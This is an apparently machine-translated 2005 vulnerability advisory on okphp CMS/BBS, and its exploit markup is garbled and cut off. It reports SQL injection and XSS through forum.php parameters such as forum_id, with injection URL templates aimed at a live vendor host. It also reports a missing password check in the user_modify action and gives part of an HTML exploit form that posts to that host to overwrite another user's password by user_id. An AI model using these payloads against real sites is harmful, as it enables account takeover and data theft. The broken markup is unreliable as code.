The author of this article: Superhei
Article Nature: Original
Release Date: 2005-08-14
Program Description
Okphp is a professional web site management system developed by www.okphp.com, the current products include: okphp CMS, okphp bbs,okphp BLOG. Because the filtering of the variable is not strict and the password authentication is lax, resulting in SQL injection, XSS, hidden variable post attack from cross permission operation.
vulnerability Attacks
1. SQL injection and XSS
"Almost" exists in various variables, such as: forum.php
Http://www.xxx.com/forum.php?action=view_forum&forum_id={sql}
Http://cn.okphp.com/forum.php?action=view_forum&forum_id= ' XSS
.......
2. Hide variable post attack
When submitting request.php?action=user_modify modify user information, there is no password authentication which leads to easy user password and data modification through user_id;
Exp:
<title>okphp discussions-powered by okphp Bbs</title
<meta http-equiv= "Content-type" content= "text/html; charset=gb2312"
<link href= "bbs/themes/" Default/css/darkblue/css.css "rel=" stylesheet "type=" Text/css "
<body bgcolor=" #CCCCCC " text= "#000000"
<table class= "Forumline2" cellspacing= "1" cellpadding= "3" border= "0"
<form name= "Form1" method= "Post" action= "http://cn.okphp.com/forum.php" enctype= "Multipart/form-data"
<tr>
<th colspan= "2" background= "Bbs/themes/default/images/darkblue/th_bg.gif" > Modify information </th>
</tr>
<tr class= "Row1" > </tr>
<tr class= "Row2"
<td width= "20%" valign= "Top" align= "right" > Password </td>
<td width= "80%"
<p>
<input type= "password" name= "Password1" size= "20"
Repeat input